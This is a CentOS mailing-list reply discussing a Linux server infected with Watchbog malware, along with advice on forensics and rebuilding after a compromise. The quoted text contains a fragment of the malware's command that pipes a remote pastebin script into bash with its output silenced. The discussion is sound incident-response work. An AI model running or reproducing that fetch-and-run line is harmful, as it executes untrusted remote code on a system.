[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

mark m.roth at 5-cent.us
Tue Dec 18 14:31:55 UTC 2018

>>> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>>> 3)ps aux | grep watchbog
>>> kill -9 pidof watchbog
>>>
>>> Any suggestions or recommendations to find out how CentOS 7.5 Linux
>>> box got infected with Watchbog Malware. Is there any open source
>>> software which can
>>
>> do you have untampered log files?
>>
>>> be installed on CentOS 7.5 Linux box to detect and prevent Malware?
>
> Standard compromise recovery procedure since forever is (your local
> policy my have slightly different order about notifications and similar):
>
> 1. back up all user data

You should have been doing that all along.

First step, before you do anything else, is pull the hard drive, put it
into a hot-swap or external bay, and dd the entire drive to an identical
one. THAT goes to forensics.

Alternatively, pull the h/d, put in a new one, reset the BIOS to factory
settings - that includes pulling the battery... *then* set what you need,
and then build it new, and restore from backups.
<snip>
Why, yes, we did just do this, um, last year, after a compromise via a
WordPress security hole. It did not manage to get to any other systems (we
checked, and only a few run WordPress).

      mark